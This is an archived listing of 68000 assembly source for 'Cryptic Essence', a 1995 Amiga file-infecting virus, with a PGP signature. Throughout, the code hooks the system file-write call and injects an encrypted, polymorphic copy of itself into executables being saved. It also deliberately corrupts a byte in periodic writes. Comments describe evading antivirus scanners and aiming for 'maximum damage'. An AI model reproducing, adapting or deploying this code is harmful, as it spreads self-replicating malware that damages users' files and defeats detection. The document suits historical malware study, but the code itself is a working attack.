home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
telefisk.org
/
virusCollection.lzx
/
VirusResearch
/
Cjezus-virus
/
CE.asm.asc
< prev
next >
Wrap
PGP Signed Message
|
2013-04-09
|
14KB
|
608 lines
-----BEGIN PGP SIGNED MESSAGE-----
******************************************************************
* *
* Cryptic Essence (c) 1995 By Evil Jesus *
* *
* the world is fucked and so am i maybe it's the other way round *
* *
******************************************************************
* note: some oddities in code are due phxass's difficulties to calculate
* right values in label (+-) label operations.
OPT !
MACHINE 68000
XDEF _write_link
XDEF _debug_ce
XDEF _check_vir
XDEF _comp_size
XDEF _nocomp_size
XDEF _vir_size
XDEF _linkspace
XDEF _relochole
XDEF _maxadr
XDEF _agression
XDEF _polywait
include "exec/types.i"
include "exec/funcdef.i"
include "exec/libraries.i"
include "exec/exec_lib.i"
include "exec/memory.i"
LINKSPACE = 6 ; space need for link vector in start of file
RELOCHOLE = 9216 ; relocation hole need for viruscode (div by 4)
MAXADR = 32766 ; maximum offset for hole
AGRESSION = 1024 ; how often to corrupt write calls
POLYWAIT = 50 ; how often use long link
; for debugging infector
; a0 dosbase
_debug_ce move.l -48+2(a0),write_old
rts
_check_vir move.l write_infect,d0
rts
_comp_size dc.l comp_e-comp_s
_nocomp_size dc.l nocomp_e-nocomp_s
_vir_size dc.l vir_e-vir_s
_linkspace dc.l LINKSPACE
_relochole dc.l RELOCHOLE
_maxadr dc.l MAXADR
_agression dc.l AGRESSION
_polywait dc.l POLYWAIT
cnop 0,4
vir_s:
comp_s:
; *******************************************************************
; dos write function link (no code before this!)
; d1 file
; d2 buffer
; d3 length
_write_link movem.l d2-d7/a2-a6,-(sp)
link a3,#-12
lea b,a4
movem.l d1-d3,(a3)
move.l write_old-b(a4),a5
add.l #1,write_count-b(a4)
move.l d2,a0
move.l d3,d0
bsr find_hole
tst.l d0
beq .normal
bsr infect
tst.l d0
beq .nosuccess
movem.l (a3),d1-d3 ; save virus and rest of data
jsr (a5)
.nosuccess bsr fix_infect ; remember to save d0
bra .exit
.normal movem.l (a3),d1-d3
subq.w #1,write_wait-b(a4)
bpl .write
move.w #AGRESSION,write_wait-b(a4)
add.l #1,write_err-b(a4)
move.l d2,a2
move.l d3,d0
lsr.l #1,d0
add.l d0,a2
not.b (a2)
jsr (a5)
not.b (a2)
bra .exit
.write jsr (a5)
.exit unlk a3
movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; search reloc hole from data
; a0 mem
; d0 size
; d0 success
find_hole movem.l d2-d7/a2-a6,-(sp)
moveq #0,d7
cmp.l #RELOCHOLE,d0 ; no point checking if smaller
blo .notexe
move.l a0,d1
btst #0,d1 ; aligment?
bne .notexe
cmp.l #$3f3,(a0) ; exe?
bne .notexe
tst.l 4(a0)
bne .notexe
move.l 8(a0),d1 ; hunk count
lsl.l #2,d1
lea 28(a0,d1.l),a1 ; first hunk
move.l a1,hunk_code-b(a4)
cmp.l #$3e9,-8(a1) ; code hunk?
bne .notexe
cmp.w #$4afc,2(a1) ; exclude libraries & devices
beq .notexe ; (rude check)
cmp.w #$4e75,2(a1)
beq .notexe
cmp.w #$4e75,4(a1)
beq .notexe
cmp.w #$4afc,4(a1)
beq .notexe
move.l -4(a1),d1
lsl.l #2,d1
cmp.l #RELOCHOLE,d1 ; enough data in codehunk
blo .notexe
lea (a1,d1.l),a2 ; reloc-32 start
lea -4(a0,d0.l),a3 ; data end
cmp.l a3,a2
bhi .notexe
cmp.l #$3ec,(a2) ; reloc hunk?
bne .noreloc
moveq #0,d2 ; calculate reloc count
lea 4(a2),a0
.calc cmp.l a3,a0
bhi .notexe
move.l (a0),d0
beq .calcdone
add.l d0,d2
lsl.l #2,d0
lea 8(a0,d0.l),a0
bra .calc
.calcdone move.l d2,d0
lsl.l #2,d0
moveq #0,d1
move.l $4.w,a6
CALLLIB _LVOAllocVec
move.l d0,d7
beq .notexe
lea 4(a2),a0 ; sort hunk
move.l d0,a1
move.l d2,d0
bsr _sort_hunk
move.l d2,d0 ; search reloc hole
move.l d7,a0
move.l (a0),d2
cmp.l #LINKSPACE,d2
blo .notexe
moveq #2,d1
.loop move.l (a0)+,d2
cmp.l #MAXADR,d2
bhi .notexe
move.l d2,d3
sub.l d1,d2
cmp.l #RELOCHOLE+4,d2
bhs .hit
move.l d3,d1
subq.l #1,d0
bne .loop
move.l hunk_code-b(a4),a0
move.l -4(a0),d2
lsl.l #2,d2
sub.l d1,d2
cmp.l #RELOCHOLE+4,d2
bhs .hit
bra .notexe
.hit move.l hunk_code-b(a4),a0
add.l d1,a0
add.l #4,a0
move.l a0,hunk_hole-b(a4)
moveq #1,d6
bra .exit
.noreloc move.l hunk_code-b(a4),a0
add.l #LINKSPACE,a0
move.l a0,hunk_hole-b(a4)
moveq #1,d6
bra .exit
.notexe moveq #0,d6
.exit tst.l d7
beq .no_free
move.l d7,a1
CALLLIB _LVOFreeVec
.no_free move.l d6,d0
movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; compress hole and virus together and prepare memory
; d0 success
infect movem.l d2-d7/a2-a6,-(sp)
* we need to allocate two buffers due compressor implementation
move.l #RELOCHOLE+128,d0
add.l #comp_e-comp_s,d0
lsl.l #1,d0
moveq #0,d1
move.l $4.w,a6
CALLLIB _LVOAllocVec
move.l d0,hunk_comp-b(a4)
beq .nocomp
move.l hunk_hole-b(a4),d0 ; distance to save
sub.l hunk_code-b(a4),d0
move.w d0,run_reloc-b(a4)
move.l hunk_code-b(a4),a0 ; copy jump vector to save
lea linksafe,a1
move.w #LINKSPACE-1,d0
.loop3 move.b (a0)+,(a1)+
dbf d0,.loop3
move.l hunk_comp-b(a4),a1
move.l hunk_hole-b(a4),a0 ; copy relochole to save
move.w #[RELOCHOLE/4]-1,d0
.loop move.l (a0)+,(a1)+
dbf d0,.loop
lea comp_s,a0 ; copy virus to save
move.w #comp_e-comp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop2 move.l (a0)+,(a1)+
dbf d0,.loop2
move.l hunk_comp-b(a4),a0 ; pack data
move.l #RELOCHOLE,d0
add.l #comp_e-comp_s,d0
move.l a0,a1
add.l d0,a1
bsr pack
tst.l d0
beq .nocomp
move.l hunk_comp-b(a4),a0 ; check if packed enough
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
move.l (a0),d0
add.l #nocomp_e-nocomp_s,d0
add.l #8,d0
cmp.l #RELOCHOLE,d0
bls .compok
clr.l (a0)
bra .nocomp
.compok
* header/data copy
lea nocomp_s,a0
move.l hunk_hole-b(a4),a1
move.w #nocomp_e-nocomp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop4 move.l (a0)+,(a1)+
dbf d0,.loop4
move.l hunk_comp-b(a4),a0 ; packed data
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
move.l (a0),d0
add.l #4,d0
lsr.w #2,d0
.loop5 move.l (a0)+,(a1)+
dbf d0,.loop5
* jump vector (including surprise for killers who don't examine code) *
move.l hunk_code-b(a4),a2
move.w run_reloc-b(a4),d0
sub.w #2,d0
sub.w #1,poly_link-b(a4)
bpl .giggle
move.w #POLYWAIT,poly_link-b(a4)
sub.w #2,d0
move.w #$4e71,(a2)+
.giggle move.w #$4efa,(a2)+ ; add jmp to start of hunk
move.w d0,(a2)
* the real magic begins... *
move.w $dff00a,d1 ; 'random' key
move.w $dff006,d2 ; 'random' add
move.b $bfe601,d3 ; add/sub mode
move.l hunk_hole-b(a4),a0
add.w #crypt_s-nocomp_s,a0
move.w #RELOCHOLE/2,d0
sub.w #crypt_s-nocomp_s,d0
lsr.w #1,d0
move.w d0,d4 ; crypt size
move.w d1,d5
.loop6 eor.w d5,(a0)+ ; crypt data
tst.b d3
bpl .addmode
sub.w d2,d5
bra .more
.addmode add.w d2,d5
.more dbf d0,.loop6
move.l hunk_hole-b(a4),a0
move.w d1,sp00-nocomp_s+2(a0) ; put key
move.w d4,sp02-nocomp_s+2(a0) ; put size
move.w #$0640,sp05-nocomp_s(a0) ; opcode: add
tst.b d3
bpl .putadd
move.w #$0440,sp05-nocomp_s(a0) ; opcode: sub
.putadd move.w d2,sp05-nocomp_s+2(a0) ; put value
* Simple Polymorph Engine (SpE) *
; add.w #$0000,dx ; %0000000000000xxx
; sub.w #$0000,dx ; %0000000000000xxx
; dbf dx,label ; %0000000000000xxx
; move.w #$0000,dx ; %0000xxx000000000
; eor.w dx,(ay)+ ; %0000xxx000000yyy
; lea label(pc),ay ; %0000yyy000000000
moveq #9,d3
move.w poly_a-b(a4),d0
add.w #1,d0
cmp.w #5,d0
bls .adrok
moveq #0,d0
.adrok move.w d0,poly_a-b(a4)
move.w #%1111111111111000,d2
and.w d2,sp04-nocomp_s(a0) ; eor
or.w d0,sp04-nocomp_s(a0)
move.w #%1111000111111111,d2
lsl.w d3,d0
and.w d2,sp03-nocomp_s(a0) ; lea
or.w d0,sp03-nocomp_s(a0)
move.w poly_d-b(a4),d0
add.w #1,d0
cmp.w #7,d0
bls .datok
moveq #0,d0
.datok move.w d0,poly_d-b(a4)
move.w d0,d1
add.w #1,d1
cmp.w #7,d1
bls .datok2
moveq #0,d1
.datok2: move.w #%1111111111111000,d2
and.w d2,sp05-nocomp_s(a0) ; add/sub
or.w d0,sp05-nocomp_s(a0)
and.w d2,sp06-nocomp_s(a0) ; dbf
or.w d1,sp06-nocomp_s(a0)
move.w #%1111000111111111,d2
lsl.w d3,d0
lsl.w d3,d1
and.w d2,sp00-nocomp_s(a0) ; move
or.w d0,sp00-nocomp_s(a0)
and.w d2,sp04-nocomp_s(a0) ; eor
or.w d0,sp04-nocomp_s(a0)
and.w d2,sp02-nocomp_s(a0) ; move
or.w d1,sp02-nocomp_s(a0)
* magic ends, now it is harder to select scan string
.skip
add.l #1,write_infect-b(a4)
moveq #1,d0
bra .exit
.nocomp moveq #0,d0
.exit: movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; repair possible damage done by infect and free everything
; (note: all registersmust be saved)
fix_infect movem.l d0-d7/a0-a6,-(sp)
move.l hunk_comp-b(a4),d0
beq .no_free
move.l d0,a0 ; check if memory file was modified
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
tst.l (a0)
beq .free_only
move.l d0,a1 ; copy relochole back
move.l hunk_hole-b(a4),a0
move.w #[RELOCHOLE/4]-1,d1
.loop move.l (a0)+,(a1)+
dbf d1,.loop
lea linksafe,a0 ; copy jump vector back
move.l hunk_code-b(a4),a1
move.w #LINKSPACE-1,d1
.loop3 move.b (a0)+,(a1)+
dbf d1,.loop3
.free_only move.l d0,a1
move.l $4.w,a6
CALLLIB _LVOFreeVec
.no_free clr.l hunk_comp-b(a4)
movem.l (sp)+,d0-d7/a0-a6
rts
; *******************************************************************
; repair runned file and install virus to memory
; a3 header adr
; a5 start of this memory
; d5 size of this memory
; a6 exec
run_code
CALLLIB _LVOForbid
lea b,a4
move.l a3,a0 ; program run adr
sub.w run_reloc-b(a4),a0
move.l a0,linkjmp-b+2(a4)
lea dosname,a1
moveq #36,d0
CALLLIB _LVOOpenLibrary
tst.l d0
beq .repair
move.l d0,a2
move.l d0,a1
CALLLIB _LVOCloseLibrary
move.l -48+2(a2),d0
move.l d0,write_old-b(a4)
cmp.l #$00f00000,d0 ; rekicked won't be active...
blo .repair
cmp.l #$00ffffff,d0
bhi .repair
move.l #vir_e-vir_s,d0 ; alloc mem for both parts
move.l #0,d1
CALLLIB _LVOAllocMem
move.l d0,d7
beq .repair
clr.l hunk_comp-b(a4)
lea comp_s,a0 ; copy compcode
move.l d7,a1
move.w #comp_e-comp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop move.l (a0)+,(a1)+
dbf d0,.loop
move.l a3,a0 ; copy nocompcode (header)
move.w #nocomp_e-nocomp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop2 move.l (a0)+,(a1)+
dbf d0,.loop2
move.l d7,-48+2(a2) ; activate CE
.repair lea linksafe-b(a4),a0 ; link back
move.l linkjmp-b+2(a4),a1
moveq #LINKSPACE-1,d1
.loop3 move.b (a0)+,(a1)+
dbf d1,.loop3
move.l a5,a0 ; relochole back
move.l a3,a1
move.w #[RELOCHOLE/4]-1,d1
.loop4 move.l (a0)+,(a1)+
dbf d1,.loop4
cmp.w #$4ef9,_LVOCacheClearU(a6)
bne .kick13
jsr _LVOCacheClearU(a6)
.kick13 move.l a5,a1
move.l d5,d0
CALLLIB _LVOFreeMem
CALLLIB _LVOPermit
movem.l (sp)+,d0-d7/a0-a6 ; crash is possible...
linkjmp jmp $43453130
; *******************************************************************
; sort data
; a0 source longwords
; a1 target area
; d0 count
_sort_hunk
movem.l a1/d0,-(sp)
.next move.l (a0),d0
beq .done
add.l #8,a0
.loop move.l (a0)+,(a1)+
subq.l #1,d0
bne .loop
bra .next
.done movem.l (sp)+,a0/d0
include "lqsort.asm"
EVEN
; *******************************************************************
; compress data
; a0 source
; a1 target
; d0 source size
; d1 target size
; d0 success
pack include "compressor.asm"
*** data ***
b:
hunk_code dc.l 0 ; codehunk adr
hunk_hole dc.l 0 ; relochole adr
hunk_comp dc.l 0 ; relochole save & virus
write_old dc.l 0 ; old write function address
write_count dc.l 0 ; write call count (total)
write_err dc.l 0 ; write call count (corrupted)
write_infect dc.l 0 ; write call count (infected)
write_wait dc.w AGRESSION ; corruption wait
poly_link dc.w POLYWAIT ; trap for viruskillers
poly_a dc.w 0
poly_d dc.w 0
linksafe blk.b LINKSPACE,0 ; old code in start of hunk
run_reloc dc.w 0 ; distance between hole and codehunk start
*** strings ***
dc.b "Cryptic Essence, © 1995 Evil Jesus (maximum false positive) "
dc.b "Extra thanks for Vesselin Bontchev for giving valueable "
dc.b "information how to reach maximum damage in essee 'Future "
dc.b "Trends in Virus Writing'"
dosname dc.b "dos.library",0
cnop 0,4
comp_e:
; --- this part cannot be compressed ---
nocomp_s:
; visible header (SpE coded)
movem.l d0-d7/a0-a6,-(sp)
sp00 move.w #$4345,d0
sp01 move.l $4.w,a6
sp02 move.w #$1234,d1
sp03 lea crypt_s(pc),a0
sp04 eor.w d0,(a0)+
sp05 add.w #$3934,d0 ; add/sub
sp06 dbf d1,sp04
sp07 cmp.w #$4ef9,_LVOCacheClearU(a6)
sp08 bne crypt_s
sp09 jsr _LVOCacheClearU(a6)
; some killers will decrypt this using header key, solution must be
; found to hide it better... fortunately code can be rewritten easily
; without fear of multiple infections of variants!
crypt_s:
move.l #RELOCHOLE+256,d0
add.l #comp_e-comp_s,d0
move.l d0,d5
move.l #0,d1
CALLLIB _LVOAllocMem
tst.l d0
beq .fail
move.l d0,a5
lea nocomp_e,a0
move.l d0,a1
bsr depack
cmp.w #$4ef9,_LVOCacheClearU(a6)
bne .kick13
jsr _LVOCacheClearU(a6)
.kick13 lea nocomp_s,a3
lea RELOCHOLE(a5),a0
add.l #run_code-comp_s,a0
jmp (a0)
.fail: movem.l (sp)+,d0-d7/a0-a6
move.l #20,d0
rts
; *******************************************************************
; decompress data
; a0 source
; a1 target
depack include "decompressor.asm"
cnop 0,4
nocomp_e:
; --- compressed data follows ---
vir_e:
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui (Amiga)
iQBFAgUBMFQGSY3j8jX6L7S9AQE9NAF/VwqG1gb2rjJ7+Hpk3UXpWMDoa/L+CgDx
xkgGgpETv/OuqDsOXK/pWmD4XM6q7HFh
=/r5A
-----END PGP SIGNATURE-----